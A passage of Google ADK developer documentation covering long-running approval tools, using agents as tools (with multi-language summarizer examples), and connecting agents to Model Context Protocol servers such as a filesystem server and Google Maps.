    # Send a notification to the approver with the link of the ticket
    return {'status': 'pending', 'approver': 'Sean Zhou', 'purpose' : purpose, 'amount': amount, 'ticket-id': 'approval-ticket-1'}

def reimburse(purpose: str, amount: float) -> dict[str, Any]:
    """Reimburse the amount of money to the employee."""
    # send the reimbursement request to payment vendor
    return {'status': 'ok'}

# 2. Wrap the function with LongRunningFunctionTool
long_running_tool = LongRunningFunctionTool(func=ask_for_approval)

# 3. Use the tool in an Agent
file_processor_agent = Agent(
    # Use a model compatible with function calling
    model="gemini-2.0-flash",
    name='reimbursement_agent',
    instruction="""
      You are an agent whose job is to handle the reimbursement process for the employees.
      If the amount is less than $100, you will automatically approve the reimbursement.

      If the amount is greater than $100, you will ask for approval from the manager.
      If the manager approves, you will call reimburse() to reimburse the amount to the employee.
      If the manager rejects, you will inform the employee of the rejection.
    """,
    tools=[reimburse, long_running_tool]
)

APP_NAME = "human_in_the_loop"
USER_ID = "1234"
SESSION_ID = "session1234"

# Session and Runner
async def setup_session_and_runner():
    session_service = InMemorySessionService()
    session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID)
    runner = Runner(agent=file_processor_agent, app_name=APP_NAME, session_service=session_service)
    return session, runner

# Agent Interaction
async def call_agent_async(query):

    def get_long_running_function_call(event: Event) -> types.FunctionCall:
        # Get the long running function call from the event
        if not event.long_running_tool_ids or not event.content or not event.content.parts:
            return
        for part in event.content.parts:
            if (
                part
                and part.function_call
                and event.long_running_tool_ids
                and part.function_call.id in event.long_running_tool_ids
            ):
                return part.function_call

    def get_function_response(event: Event, function_call_id: str) -> types.FunctionResponse:
        # Get the function response for the function call with the specified id.
        if not event.content or not event.content.parts:
            return
        for part in event.content.parts:
            if (
                part
                and part.function_response
                and part.function_response.id == function_call_id
            ):
                return part.function_response

    content = types.Content(role='user', parts=[types.Part(text=query)])
    session, runner = await setup_session_and_runner()

    print("\nRunning agent...")
    events_async = runner.run_async(
        session_id=session.id, user_id=USER_ID, new_message=content
    )

    long_running_function_call, long_running_function_response, ticket_id = None, None, None
    async for event in events_async:
        # Use the helpers to find the long running function call, then its first response
        if not long_running_function_call:
            long_running_function_call = get_long_running_function_call(event)
        else:
            _potential_response = get_function_response(event, long_running_function_call.id)
            if _potential_response:  # Only update if we get a non-None response
                long_running_function_response = _potential_response
                ticket_id = long_running_function_response.response['ticket-id']
        if event.content and event.content.parts:
            if text := ''.join(part.text or '' for part in event.content.parts):
                print(f'[{event.author}]: {text}')

    if long_running_function_response:
        # query the status of the corresponding ticket via ticket_id
        # send back an intermediate / final response
        updated_response = long_running_function_response.model_copy(deep=True)
        updated_response.response = {'status': 'approved'}
        async for event in runner.run_async(
            session_id=session.id, user_id=USER_ID, new_message=types.Content(parts=[types.Part(function_response = updated_response)], role='user')
        ):
            if event.content and event.content.parts:
                if text := ''.join(part.text or '' for part in event.content.parts):
                    print(f'[{event.author}]: {text}')

# Note: In Colab, you can directly use 'await' at the top level.
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop.
# reimbursement that doesn't require approval
# asyncio.run(call_agent_async("Please reimburse 50$ for meals"))  # For standalone scripts, use this line instead of the one below
await call_agent_async("Please reimburse 50$ for meals")  # Works as-is in notebooks (top-level await)

# reimbursement that requires approval
# asyncio.run(call_agent_async("Please reimburse 200$ for meals"))  # For standalone scripts, use this line instead of the one below
await call_agent_async("Please reimburse 200$ for meals")  # Works as-is in notebooks (top-level await)
```

#### Key aspects of this example

- **`LongRunningFunctionTool`**: Wraps the supplied method/function. In this example, the function's return value (a `pending` status with a ticket ID) reaches the model as the first FunctionResponse, and the application later sends the updated result as another FunctionResponse that carries the same function call ID.
- **Agent instruction**: Directs the LLM when to use the tool and how to act on the incoming FunctionResponses (pending vs. approved or rejected) when updating the user.
- **Final result**: The application sends the final result dictionary (here `{'status': 'approved'}`) in the concluding FunctionResponse to indicate completion.

## Agent-as-a-Tool

Agent-as-a-Tool lets you use the capabilities of other agents within your system by calling them as tools. One agent invokes another to perform a specific task, effectively **delegating responsibility** for that task. This is conceptually similar to creating a Python function that calls another agent and uses the agent's response as the function's return value.

### Key difference from sub-agents

It's important to distinguish an Agent-as-a-Tool from a Sub-Agent.

- **Agent-as-a-Tool:** When Agent A calls Agent B as a tool (using Agent-as-a-Tool), Agent B's answer is **passed back** to Agent A, which then summarizes the answer and generates a response to the user. Agent A retains control and continues to handle future user input.
- **Sub-agent:** When Agent A calls Agent B as a sub-agent, the responsibility of answering the user is completely **transferred to Agent B**. Agent A is effectively out of the loop. All subsequent user input will be answered by Agent B.
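The difference in control flow described above can be sketched with a toy model in plain Python. This is not ADK code: `ToyAgent`, `Conversation`, `call_as_tool`, `transfer_to`, and `next_turn` are hypothetical names invented for illustration, and the "agents" are simple functions rather than LLMs. The only point is to show who answers the next user turn in each pattern.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class ToyAgent:
    """Hypothetical stand-in for an agent: a name plus a reply function."""
    name: str
    reply: Callable[[str], str]


class Conversation:
    """Tracks which agent currently answers the user (illustrative only)."""

    def __init__(self, root: ToyAgent):
        self.active = root

    def call_as_tool(self, tool_agent: ToyAgent, text: str) -> str:
        # Agent-as-a-Tool: the result is handed back to the caller,
        # and the active agent does not change.
        result = tool_agent.reply(text)
        return f"{self.active.name} (using {tool_agent.name}): {result}"

    def transfer_to(self, sub_agent: ToyAgent, text: str) -> str:
        # Sub-agent: responsibility for answering moves to the sub-agent,
        # which also handles later turns.
        self.active = sub_agent
        return f"{self.active.name}: {sub_agent.reply(text)}"

    def next_turn(self, text: str) -> str:
        # Whoever is active answers the next user message.
        return f"{self.active.name}: {self.active.reply(text)}"


agent_a = ToyAgent("agent_a", lambda text: f"A answers '{text}'")
agent_b = ToyAgent("agent_b", lambda text: f"B answers '{text}'")

tool_style = Conversation(agent_a)
print(tool_style.call_as_tool(agent_b, "summarize this"))
print(tool_style.next_turn("thanks"))      # still handled by agent_a

transfer_style = Conversation(agent_a)
print(transfer_style.transfer_to(agent_b, "summarize this"))
print(transfer_style.next_turn("thanks"))  # now handled by agent_b
```

In ADK terms, the first pattern corresponds to passing `AgentTool(agent=agent_b)` in Agent A's `tools` list, while the second corresponds to registering Agent B as a sub-agent of Agent A.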
### Usage To use an agent as a tool, wrap the agent with the AgentTool class. ```python tools=[AgentTool(agent=agent_b)] ``` ```typescript tools: [new AgentTool({agent: agentB})] ``` ```go agenttool.New(agent, &agenttool.Config{...}) ``` ```java AgentTool.create(agent) ``` ### Customization The `AgentTool` class provides the following attributes for customizing its behavior: - **skip_summarization: bool:** If set to True, the framework will **bypass the LLM-based summarization** of the tool agent's response. This can be useful when the tool's response is already well-formatted and requires no further processing. Example ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.agent_tool import AgentTool from google.genai import types APP_NAME="summary_agent" USER_ID="user1234" SESSION_ID="1234" summary_agent = Agent( model="gemini-2.0-flash", name="summary_agent", instruction="""You are an expert summarizer. Please read the following text and provide a concise summary.""", description="Agent to summarize text", ) root_agent = Agent( model='gemini-2.0-flash', name='root_agent', instruction="""You are a helpful assistant. When the user provides a text, use the 'summarize' tool to generate a summary. 
Always forward the user's message exactly as received to the 'summarize' tool, without modifying or summarizing it yourself. Present the response from the tool to the user.""", tools=[AgentTool(agent=summary_agent, skip_summarization=True)] ) # Session and Runner async def setup_session_and_runner(): session_service = InMemorySessionService() session = await session_service.create_session(app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID) runner = Runner(agent=root_agent, app_name=APP_NAME, session_service=session_service) return session, runner # Agent Interaction async def call_agent_async(query): content = types.Content(role='user', parts=[types.Part(text=query)]) session, runner = await setup_session_and_runner() events = runner.run_async(user_id=USER_ID, session_id=SESSION_ID, new_message=content) async for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("Agent Response: ", final_response) long_text = """Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages.""" # Note: In Colab, you can directly use 'await' at the top level. 
# If running this code as a standalone Python script, you'll need to use asyncio.run() or manage the event loop. await call_agent_async(long_text) ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { AgentTool, InMemoryRunner, LlmAgent, } from '@google/adk'; import {Part, createUserContent} from '@google/genai'; /** * This example demonstrates how to use an agent as a tool. */ async function main() { // Define the summarization agent that will be used as a tool const summaryAgent = new LlmAgent({ name: 'summary_agent', model: 'gemini-2.5-flash', description: 'Agent to summarize text', instruction: 'You are an expert summarizer. Please read the following text and provide a concise summary.', }); // Define the main agent that uses the summarization agent as a tool. // skipSummarization is set to true, so the main_agent will directly output // the result from the summary_agent without further processing. const mainAgent = new LlmAgent({ name: 'main_agent', model: 'gemini-2.5-flash', instruction: "You are a helpful assistant. When the user provides a text, use the 'summary_agent' tool to generate a summary. Always forward the user's message exactly as received to the 'summary_agent' tool, without modifying or summarizing it yourself. 
Present the response from the tool to the user.", tools: [new AgentTool({agent: summaryAgent, skipSummarization: true})], }); const appName = 'agent-as-a-tool-app'; const runner = new InMemoryRunner({agent: mainAgent, appName}); const longText = `Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages.`; // Create the session before running the agent await runner.sessionService.createSession({ appName, userId: 'user1', sessionId: 'session1', }); // Run the agent with the long text to summarize const events = runner.runAsync({ userId: 'user1', sessionId: 'session1', newMessage: createUserContent(longText), }); // Print the final response from the agent console.log('Agent Response:'); for await (const event of events) { if (event.content?.parts?.length) { const responsePart = event.content.parts.find((p: Part) => p.functionResponse); if (responsePart && responsePart.functionResponse) { console.log(responsePart.functionResponse.response); } } } } main(); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/adk/tool" 
"google.golang.org/adk/tool/agenttool" "google.golang.org/genai" ) // createSummarizerAgent creates an agent whose sole purpose is to summarize text. func createSummarizerAgent(ctx context.Context) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "SummarizerAgent", Model: model, Instruction: "You are an expert at summarizing text. Take the user's input and provide a concise summary.", Description: "An agent that summarizes text.", }) } // createMainAgent creates the primary agent that will use the summarizer agent as a tool. func createMainAgent(ctx context.Context, tools ...tool.Tool) (agent.Agent, error) { model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { return nil, err } return llmagent.New(llmagent.Config{ Name: "MainAgent", Model: model, Instruction: "You are a helpful assistant. If you are asked to summarize a long text, use the 'summarize' tool. " + "After getting the summary, present it to the user by saying 'Here is a summary of the text:'.", Description: "The main agent that can delegate tasks.", Tools: tools, }) } func RunAgentAsToolSimulation() { ctx := context.Background() // 1. Create the Tool Agent (Summarizer) summarizerAgent, err := createSummarizerAgent(ctx) if err != nil { log.Fatalf("Failed to create summarizer agent: %v", err) } // 2. Wrap the Tool Agent in an AgentTool summarizeTool := agenttool.New(summarizerAgent, &agenttool.Config{ SkipSummarization: true, }) // 3. Create the Main Agent and provide it with the AgentTool mainAgent, err := createMainAgent(ctx, summarizeTool) if err != nil { log.Fatalf("Failed to create main agent: %v", err) } // 4. Run the main agent prompt := ` Please summarize this text for me: Quantum computing represents a fundamentally different approach to computation, leveraging the bizarre principles of quantum mechanics to process information. 
Unlike classical computers that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled, meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages. ` fmt.Printf("\nPrompt: %s\nResponse: ", prompt) callAgent(context.Background(), mainAgent, prompt) fmt.Println("\n---") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.tools.AgentTool; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; public class AgentToolCustomization { private static final String APP_NAME = "summary_agent"; private static final String USER_ID = "user1234"; public static void initAgentAndRun(String prompt) { LlmAgent summaryAgent = LlmAgent.builder() .model("gemini-2.0-flash") .name("summaryAgent") .instruction( "You are an expert summarizer. Please read the following text and provide a concise summary.") .description("Agent to summarize text") .build(); // Define root_agent LlmAgent rootAgent = LlmAgent.builder() .model("gemini-2.0-flash") .name("rootAgent") .instruction( "You are a helpful assistant. When the user provides a text, always use the 'summaryAgent' tool to generate a summary. 
Always forward the user's message exactly as received to the 'summaryAgent' tool, without modifying or summarizing it yourself. Present the response from the tool to the user.")
            .description("Assistant agent")
            .tools(AgentTool.create(summaryAgent, true)) // Set skipSummarization to true
            .build();

    // Create an InMemoryRunner
    InMemoryRunner runner = new InMemoryRunner(rootAgent, APP_NAME);
    // InMemoryRunner automatically creates a session service. Create a session using the service
    Session session = runner.sessionService().createSession(APP_NAME, USER_ID).blockingGet();
    Content userMessage = Content.fromParts(Part.fromText(prompt));

    // Run the agent
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);

    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }

  public static void main(String[] args) {
    String longText =
        """
            Quantum computing represents a fundamentally different approach to computation,
            leveraging the bizarre principles of quantum mechanics to process information. Unlike classical computers
            that rely on bits representing either 0 or 1, quantum computers use qubits which can exist in a state of superposition - effectively
            being 0, 1, or a combination of both simultaneously. Furthermore, qubits can become entangled,
            meaning their fates are intertwined regardless of distance, allowing for complex correlations. This parallelism and
            interconnectedness grant quantum computers the potential to solve specific types of incredibly complex problems - such
            as drug discovery, materials science, complex system optimization, and breaking certain types of cryptography - far
            faster than even the most powerful classical supercomputers could ever achieve, although the technology is still largely in its developmental stages.""";

    initAgentAndRun(longText);
  }
}
```

### How it works

1. When the `main_agent` receives the long text, its instruction tells it to use the 'summarize' tool for long texts.
1. The framework recognizes 'summarize' as an `AgentTool` that wraps the `summary_agent`.
1. Behind the scenes, the `main_agent` calls the `summary_agent` with the long text as input.
1. The `summary_agent` processes the text according to its instruction and generates a summary.
1. **The response from the `summary_agent` is then passed back to the `main_agent`.**
1. The `main_agent` can then take the summary and formulate its final response to the user (e.g., "Here's a summary of the text: ...").

# Model Context Protocol Tools

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

This guide walks you through two ways of integrating Model Context Protocol (MCP) with ADK.

MCP tools for ADK

For a list of pre-built MCP tools for ADK, see [Tools and Integrations](/adk-docs/integrations/?topic=mcp).

## What is Model Context Protocol (MCP)?

The Model Context Protocol (MCP) is an open standard for how Large Language Models (LLMs) like Gemini and Claude communicate with external applications, data sources, and tools. Think of it as a universal connection mechanism that simplifies how LLMs obtain context, execute actions, and interact with various systems.

MCP follows a client-server architecture, defining how **data** (resources), **interactive templates** (prompts), and **actionable functions** (tools) are exposed by an **MCP server** and consumed by an **MCP client** (which could be an LLM host application or an AI agent).

This guide covers two primary integration patterns:

1. **Using Existing MCP Servers within ADK:** An ADK agent acts as an MCP client, leveraging tools provided by external MCP servers.
1. **Exposing ADK Tools via an MCP Server:** Building an MCP server that wraps ADK tools, making them accessible to any MCP client.
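To make the client-server exchange described above more concrete, the sketch below builds the two requests an MCP client typically sends when working with tools: one to discover the server's tools and one to call a tool. MCP messages use JSON-RPC 2.0, and `tools/list` and `tools/call` are the method names used by the MCP specification. The helper `make_request` is a hypothetical function written for this illustration, the folder path is a placeholder, and no real server is contacted; in practice an MCP client library (or ADK itself) builds and sends these messages for you.

```python
import json
from itertools import count
from typing import Any, Optional

# JSON-RPC requests carry an id so responses can be matched to them.
_request_ids = count(1)


def make_request(method: str, params: Optional[dict[str, Any]] = None) -> dict[str, Any]:
    """Build a JSON-RPC 2.0 request envelope (hypothetical helper)."""
    request: dict[str, Any] = {
        "jsonrpc": "2.0",
        "id": next(_request_ids),
        "method": method,
    }
    if params is not None:
        request["params"] = params
    return request


# 1. Discovery: ask the server which tools it exposes.
list_tools_request = make_request("tools/list")

# 2. Invocation: call one tool by name with JSON arguments.
#    The tool name and argument mirror the file system example in this guide;
#    the path is a placeholder.
call_tool_request = make_request(
    "tools/call",
    {"name": "list_directory", "arguments": {"path": "/path/to/your/folder"}},
)

print(json.dumps(list_tools_request))
print(json.dumps(call_tool_request, indent=2))
```

Whichever integration pattern you choose, the same two kinds of messages are exchanged: an ADK agent acting as an MCP client sends them, and an MCP server that wraps ADK tools answers them.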
## Prerequisites

Before you begin, ensure you have the following set up:

- **Set up ADK:** Follow the standard ADK [setup instructions](https://google.github.io/adk-docs/get-started/index.md) in the quickstart.
- **Install/update Python/Java:** MCP requires Python 3.9 or higher, or Java 17 or higher.
- **Set up Node.js and npx:** **(Python only)** Many community MCP servers are distributed as Node.js packages and run using `npx`. Install Node.js (which includes npx) if you haven't already. For details, see .
- **Verify installations:** **(Python only)** Confirm `adk` and `npx` are in your PATH within the activated virtual environment:

    ```shell
    # Both commands should print the path to the executables.
    which adk
    which npx
    ```

## 1. Using MCP servers with ADK agents (ADK as an MCP client) in `adk web`

This section demonstrates how to integrate tools from external MCP (Model Context Protocol) servers into your ADK agents. This is the **most common** integration pattern when your ADK agent needs to use capabilities provided by an existing service that exposes an MCP interface. You will see how the `McpToolset` class can be added directly to your agent's `tools` list, where it connects to an MCP server, discovers its tools, and makes them available to your agent. These examples primarily focus on interactions within the `adk web` development environment.

### `McpToolset` class

The `McpToolset` class is ADK's primary mechanism for integrating tools from an MCP server. When you include an `McpToolset` instance in your agent's `tools` list, it automatically handles the interaction with the specified MCP server. Here's how it works:

1. **Connection Management:** On initialization, `McpToolset` establishes and manages the connection to the MCP server. This can be a local server process (using `StdioConnectionParams` for communication over standard input/output) or a remote server (using `SseConnectionParams` for Server-Sent Events).
The toolset also handles the graceful shutdown of this connection when the agent or application terminates. 1. **Tool Discovery & Adaptation:** Once connected, `McpToolset` queries the MCP server for its available tools (via the `list_tools` MCP method). It then converts the schemas of these discovered MCP tools into ADK-compatible `BaseTool` instances. 1. **Exposure to Agent:** These adapted tools are then made available to your `LlmAgent` as if they were native ADK tools. 1. **Proxying Tool Calls:** When your `LlmAgent` decides to use one of these tools, `McpToolset` transparently proxies the call (using the `call_tool` MCP method) to the MCP server, sends the necessary arguments, and returns the server's response back to the agent. 1. **Filtering (Optional):** You can use the `tool_filter` parameter when creating an `McpToolset` to select a specific subset of tools from the MCP server, rather than exposing all of them to your agent. The following examples demonstrate how to use `McpToolset` within the `adk web` development environment. For scenarios where you need more fine-grained control over the MCP connection lifecycle or are not using `adk web`, refer to the "Using MCP Tools in your own Agent out of `adk web`" section later in this page. ### Example 1: File System MCP Server This Python example demonstrates connecting to a local MCP server that provides file system operations. #### Step 1: Define your Agent with `McpToolset` Create an `agent.py` file (e.g., in `./adk_agent_samples/mcp_agent/agent.py`). The `McpToolset` is instantiated directly within the `tools` list of your `LlmAgent`. - **Important:** Replace `"/path/to/your/folder"` in the `args` list with the **absolute path** to an actual folder on your local system that the MCP server can access. - **Important:** Place the `.env` file in the parent directory of the `./adk_agent_samples` directory. 
```python
# ./adk_agent_samples/mcp_agent/agent.py
import os # Required for path operations
from google.adk.agents import LlmAgent
from google.adk.tools.mcp_tool import McpToolset
from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams
from mcp import StdioServerParameters

# The MCP server needs an ABSOLUTE path to the folder it may access.
# REPLACE "/path/to/your/folder" with an actual path for your setup.
# Note: os.path.join() discards earlier components when a later one is
# absolute, so an absolute path given here is used as-is. A relative name
# such as "your_folder" (e.g., ./adk_agent_samples/mcp_agent/your_folder)
# is instead resolved relative to the directory containing agent.py.
TARGET_FOLDER_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), "/path/to/your/folder")

root_agent = LlmAgent(
    model='gemini-2.0-flash',
    name='filesystem_assistant_agent',
    instruction='Help the user manage their files. You can list files, read files, etc.',
    tools=[
        McpToolset(
            connection_params=StdioConnectionParams(
                server_params = StdioServerParameters(
                    command='npx',
                    args=[
                        "-y",  # Argument for npx to auto-confirm install
                        "@modelcontextprotocol/server-filesystem",
                        # IMPORTANT: This MUST be an ABSOLUTE path to a folder the
                        # npx process can access.
                        # Replace with a valid absolute path on your system.
                        # For example: "/Users/youruser/accessible_mcp_files"
                        # or use a dynamically constructed absolute path:
                        os.path.abspath(TARGET_FOLDER_PATH),
                    ],
                ),
            ),
            # Optional: Filter which tools from the MCP server are exposed
            # tool_filter=['list_directory', 'read_file']
        )
    ],
)
```

#### Step 2: Create an `__init__.py` file

Ensure you have an `__init__.py` in the same directory as `agent.py` to make it a discoverable Python package for ADK.

```python
# ./adk_agent_samples/mcp_agent/__init__.py
from . import agent
```

#### Step 3: Run `adk web` and Interact

Navigate to the parent directory of `mcp_agent` (e.g., `adk_agent_samples`) in your terminal and run:

```shell
cd ./adk_agent_samples # Or your equivalent parent directory
adk web
```

Note for Windows users

If you hit the `_make_subprocess_transport NotImplementedError`, consider using `adk web --no-reload` instead.

Once the ADK Web UI loads in your browser:

1. Select the `filesystem_assistant_agent` from the agent dropdown.
1. Try prompts like:
    - "List files in the current directory."
    - "Can you read the file named sample.txt?" (assuming you created it in `TARGET_FOLDER_PATH`).
    - "What is the content of `another_file.md`?"

You should see the agent interacting with the MCP file system server, and the server's responses (file listings, file content) relayed through the agent. The `adk web` console (the terminal where you ran the command) might also show logs from the `npx` process if it outputs to stderr.

For Java, refer to the following sample to define an agent that initializes the `McpToolset`:

```java
package agents;

import com.google.adk.JsonBaseModel;
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.RunConfig;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.tools.mcp.McpTool;
import com.google.adk.tools.mcp.McpToolset;
import com.google.adk.tools.mcp.McpToolset.McpToolsAndToolsetResult;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.modelcontextprotocol.client.transport.ServerParameters;

import java.util.List;
import java.util.concurrent.CompletableFuture;

public class McpAgentCreator {

    /**
     * Initializes an McpToolset, retrieves tools from an MCP server using stdio,
     * creates an LlmAgent with these tools, sends a prompt to the agent,
     * and ensures the toolset is closed.
     * @param args Command line arguments (not used).
     */
    public static void main(String[] args) {
        // Note: you may have permissions issues if the folder is outside home
        String yourFolderPath = "~/path/to/folder";

        ServerParameters connectionParams = ServerParameters.builder("npx")
                .args(List.of(
                        "-y",
                        "@modelcontextprotocol/server-filesystem",
                        yourFolderPath
                ))
                .build();

        try {
            // Connect to the MCP server and wait for its tools to be discovered
            CompletableFuture<McpToolsAndToolsetResult> futureResult =
                    McpToolset.fromServer(connectionParams, JsonBaseModel.getMapper());

            McpToolsAndToolsetResult result = futureResult.join();

            // try-with-resources closes the toolset (and its connection) when done
            try (McpToolset toolset = result.getToolset()) {
                List<McpTool> tools = result.getTools();

                LlmAgent agent = LlmAgent.builder()
                        .model("gemini-2.0-flash")
                        .name("enterprise_assistant")
                        .description("An agent to help users access their file systems")
                        .instruction(
                                "Help user accessing their file systems. You can list files in a directory."
                        )
                        .tools(tools)
                        .build();

                System.out.println("Agent created: " + agent.name());

                InMemoryRunner runner = new InMemoryRunner(agent);
                String userId = "user123";
                String sessionId = "1234";
                String promptText = "Which files are in this directory - " + yourFolderPath + "?";

                // Explicitly create the session first
                try {
                    // appName for InMemoryRunner defaults to agent.name() if not specified in constructor
                    runner.sessionService().createSession(runner.appName(), userId, null, sessionId).blockingGet();
                    System.out.println("Session created: " + sessionId + " for user: " + userId);
                } catch (Exception sessionCreationException) {
                    System.err.println("Failed to create session: " + sessionCreationException.getMessage());
                    sessionCreationException.printStackTrace();
                    return;
                }

                Content promptContent = Content.fromParts(Part.fromText(promptText));

                System.out.println("\nSending prompt: \"" + promptText + "\" to agent...\n");

                runner.runAsync(userId, sessionId, promptContent, RunConfig.builder().build())
                        .blockingForEach(event -> {
                            System.out.println("Event received: " + event.toJson());
                        });
            }
        } catch (Exception e) {
            System.err.println("An error occurred: " + e.getMessage());
            e.printStackTrace();
        }
} } ``` Assuming a folder containing three files named `first`, `second` and `third`, successful response will look like this: ```shell Event received: {"id":"163a449e-691a-48a2-9e38-8cadb6d1f136","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"functionCall":{"id":"adk-388b4ac2-d40e-4f6a-bda6-f051110c6498","args":{"path":"~/home-test"},"name":"list_directory"}}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377543788} Event received: {"id":"8728380b-bfad-4d14-8421-fa98d09364f1","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"functionResponse":{"id":"adk-388b4ac2-d40e-4f6a-bda6-f051110c6498","name":"list_directory","response":{"text_output":[{"text":"[FILE] first\n[FILE] second\n[FILE] third"}]}}}],"role":"user"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377544679} Event received: {"id":"8fe7e594-3e47-4254-8b57-9106ad8463cb","invocationId":"e-c2458c56-e57a-45b2-97de-ae7292e505ef","author":"enterprise_assistant","content":{"parts":[{"text":"There are three files in the directory: first, second, and third."}],"role":"model"},"actions":{"stateDelta":{},"artifactDelta":{},"requestedAuthConfigs":{}},"timestamp":1747377544689} ``` For Typescript, you can define an agent that initializes the `MCPToolset` as follows: ```typescript import 'dotenv/config'; import {LlmAgent, MCPToolset} from "@google/adk"; // REPLACE THIS with an actual absolute path for your setup. const TARGET_FOLDER_PATH = "/path/to/your/folder"; export const rootAgent = new LlmAgent({ model: "gemini-2.5-flash", name: "filesystem_assistant_agent", instruction: "Help the user manage their files. You can list files, read files, etc.", tools: [ // To filter tools, pass a list of tool names as the second argument // to the MCPToolset constructor. 
// e.g., new MCPToolset(connectionParams, ['list_directory', 'read_file']) new MCPToolset( { type: "StdioConnectionParams", serverParams: { command: "npx", args: [ "-y", "@modelcontextprotocol/server-filesystem", // IMPORTANT: This MUST be an ABSOLUTE path to a folder the // npx process can access. // Replace with a valid absolute path on your system. // For example: "/Users/youruser/accessible_mcp_files" TARGET_FOLDER_PATH, ], }, } ) ], }); ``` ### Example 2: Google Maps MCP Server This example demonstrates connecting to the Google Maps MCP server. #### Step 1: Get API Key and Enable APIs 1. **Google Maps API Key:** Follow the directions at [Use API keys](https://developers.google.com/maps/documentation/javascript/get-api-key#create-api-keys) to obtain a Google Maps API Key. 1. **Enable APIs:** In your Google Cloud project, ensure the following APIs are enabled: - Directions API - Routes API For instructions, see the [Getting started with Google Maps Platform](https://developers.google.com/maps/get-started#enable-api-sdk) documentation. #### Step 2: Define your Agent with `McpToolset` for Google Maps Modify your `agent.py` file (e.g., in `./adk_agent_samples/mcp_agent/agent.py`). Replace `YOUR_GOOGLE_MAPS_API_KEY` with the actual API key you obtained. ```python # ./adk_agent_samples/mcp_agent/agent.py import os from google.adk.agents import LlmAgent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # Retrieve the API key from an environment variable or directly insert it. # Using an environment variable is generally safer. # Ensure this environment variable is set in the terminal where you run 'adk web'. 
